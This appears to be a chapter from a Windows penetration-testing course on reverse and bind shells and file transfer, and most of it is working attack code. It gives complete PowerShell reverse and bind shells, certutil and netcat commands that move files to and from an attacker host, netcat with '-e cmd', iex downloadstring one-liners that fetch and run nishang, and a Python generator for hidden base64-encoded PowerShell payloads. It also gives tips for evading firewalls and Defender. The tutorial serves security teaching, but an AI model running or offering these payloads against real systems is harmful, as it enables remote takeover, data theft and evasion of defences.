3 - Reverse Shells in Windows

Topics

1. Introduction to the Windows Shells

2. Windows Permissions

3. Reverse Shells in Windows

4. SeImpersonatePrivilege Exploitation

5. On Cross Compilation

6. Windows Services

7. Weak Service Permissions

8. Unquoted Service Path

9. DLL Hijacking

10. Always Install Elevated

11. Files with Sensitive Data

12. Windows Hashes

13. Stored Credentials and the Windows Vault

14. Scheduled Task

15. Critical Registry Paths

16. Useful Tools

17. AMSI Bypass

What is a Shell?

A shell is an interface that allows users to execute commands on an operating system. In the context of security and exploitation, a shell refers to a command-line interface provided to an attacker, enabling them to execute commands on a compromised machine.

---

Bind and Reverse Shells

https://media.licdn.com/dms/image/v2/D4D22AQFAfcG3QIDjAA/feedshare-shrink_800/feedshare-shrink_800/0/1695655914673?e=2147483647&v=beta&t=rrTRnpk6But_BZIY76lIqYdXzSpH3DzIPzaSs4pZFBY

Reverse Shells

A reverse shell involves the target machine initiating a connection back to the attacker's system. The attacker then uses this connection to execute commands on the target machine.

Online - Reverse Shell Generatorwww.revshells.com

How It Works

1. The attacker sets up a listener on their machine to wait for incoming connections.

2. The target machine executes a payload that connects back to the attacker’s listener.

3. Once the connection is established, the attacker gains shell access to the target system.

Example on Windows

Using PowerShell to create a reverse shell:

$client = New-Object System.Net.Sockets.TCPClient("attacker_ip", 4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535 | % {0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
    $sendback = (iex $data 2>&1 | Out-String )
    $sendback2  = $sendback + "PS " + (pwd).Path + "> "
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte,0,$sendbyte.Length)
    $stream.Flush()
}
$client.Close()

Advantages of Reverse Shells

• Firewall Evasion: Since the target initiates the connection, it often bypasses restrictive inbound firewall rules.

• Ease of Use: Simplifies access when the attacker has a dynamic or NATed IP.

---

Bind Shells

A bind shell involves the target machine listening for an incoming connection from the attacker. The attacker then connects to the target machine to gain shell access.

How It Works

1. The target machine executes a payload that binds a shell to a specific port.

2. The attacker connects to this port using a client (e.g., netcat).

3. Once connected, the attacker can execute commands on the target machine.

Example on Windows

Using PowerShell to create a bind shell:

$listener = [System.Net.Sockets.TcpListener]4444
$listener.Start()
$client = $listener.AcceptTcpClient()
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = ([text.encoding]::ASCII).GetString($bytes,0,$i)
    $sendback = (iex $data 2>&1 | Out-String )
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback)
    $stream.Write($sendbyte,0,$sendbyte.Length)
    $stream.Flush()
}
$listener.Stop()

Drawbacks of Bind Shells

• Firewall Restrictions: Most firewalls block inbound connections to unexpected ports.

• Network Exposure: Requires the attacker to know the target's IP and accessible port.

Why Reverse Shells Are Preferred

• Firewall Evasion: Since reverse shells initiate outbound connections, they are more likely to bypass firewalls.

• Dynamic Networks: The attacker can operate from behind NAT or a dynamic IP without needing direct access to the target's network.

• Stealth: Outbound connections are less suspicious and harder to trace compared to open inbound ports.

---

File Transfer in Windows

File transfer is often necessary for exploitation, privilege escalation, or data exfiltration. Several methods can be used to transfer files on Windows systems.

if windows defender is active on the machine, the usage of certutil for the downloading of file can trigger an antivirus warning, disabling the download of the file, or utilize techniques for evading it.

Native Methods

1. Using certutil Certutil is a Windows tool that can download files:

   certutil -urlcache -split -f http://attacker_ip/file.exe file.exe

2. Using PowerShell PowerShell (iwr) can download files via HTTP:

   Invoke-WebRequest -Uri http://attacker_ip/file.exe -OutFile file.exe

3. Using FTP Windows supports FTP commands:

   ftp
   open <attacker_ip>
   put file.txt
   get file.txt

4. Using SMB Shares Files can be transferred using network shares:

   net use \\<attacker_ip>\share /user:username password
   copy file.exe \\<attacker_ip>\share

Third-Party Tools

1. Netcat Set up a listener on the attacker machine:

   nc -lvp 4444 > file.exe

   Send the file from the target:

   nc attacker_ip 4444 < file.exe

2. Python Simple HTTP Server On the attacker machine:

   python3 -m http.server 80

   On the target machine:

   certutil -urlcache -split -f http://attacker_ip/file.exe file.exe

Spawning a Reverse Shell

Online - Reverse Shell Generatorwww.revshells.com

cmd.exe

The cmd.exe reverse shell relies on utilities like ncat.exe to establish a connection. The process involves downloading the necessary binary, setting up a listener on the attacker machine, and initiating the reverse connection from the victim machine.

GitHub - int0x33/nc.exe: Netcat for windows 32/64 bitGitHub

Steps

1. Download ncat.exe on the Target Machine ncat.exe (a lightweight implementation of Netcat) is required for creating the reverse shell.

   iwr -uri "https://raw.githubusercontent.com/int0x33/nc.exe/master/nc64.exe" -OutFile nc64.exe

2. Set Up a Listener on the Attacker Machine The attacker machine must have a listener ready to receive the reverse connection.

   nc -lvnp 7777

3. Initiate the Reverse Shell from the Target Machine On the victim machine, execute the following command to connect back to the attacker and spawn a shell:

   C:\Users\Quickemu\Desktop\nc64.exe 192.168.122.1 7777 -e cmd

---

Powershell

Using Invoke-PowerShellTcp.ps1 Script

Invoke-PowerShellTcp.ps1 is a PowerShell script designed for reverse shells.

nishang/Shells/Invoke-PowerShellTcp.ps1 at master · samratashok/nishangGitHub

1. Download the Script on the Attacker Machine

   wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

2. Configure the Script Add the line to specify the attacker's IP and port:

   echo "Invoke-PowerShellTcp -Reverse -IPAddress 192.168.122.1 -Port 7777" >> Invoke-PowerShellTcp.ps1

3. Host the Script on an HTTP Server Use Python to serve the script for download:

   python3 -m http.server 1337

4. Start listening mode with Netcat on attacker machine

netcat -nvlp 7777

1. Execute the Script from the Target Machine

• From CMD:

  powershell -c "iex(new-object net.webclient).downloadstring(\"http://192.168.122.1:1337/Invoke-PowerShellTcp.ps1\")"

• From PowerShell:

  iex(new-object net.webclient).downloadstring("http://192.168.122.1:1337/Invoke-PowerShellTcp.ps1")

---

Using a Base64-Encoded Payload

An alternative method involves encoding a reverse shell script in Base64 and executing it directly.

1. Generate the Payload Using Python Use the following Python script to create a Base64-encoded reverse shell payload:

   import base64
   
   IP = "192.168.122.1"
   PORT = 7777
   
   def gen_payload(ip, port):
       payload = f"$client = New-Object System.Net.Sockets.TCPClient('{ip}', {port});"
       payload += "$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};"
       payload += "while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){"
       payload += "$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);"
       payload += "$sendback = (iex $data 2>&1 | Out-String );"
       payload += "$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';"
       payload += "$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);"
       payload += "$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}"
       payload += ";$client.Close()"
       return "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()
   
   print(gen_payload(IP, PORT))

2. Execute the Payload on the Target Machine Copy the generated Base64 string and execute it directly in PowerShell:

   powershell -nop -w hidden -e <Base64-Payload>

Disclaimer

❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!❗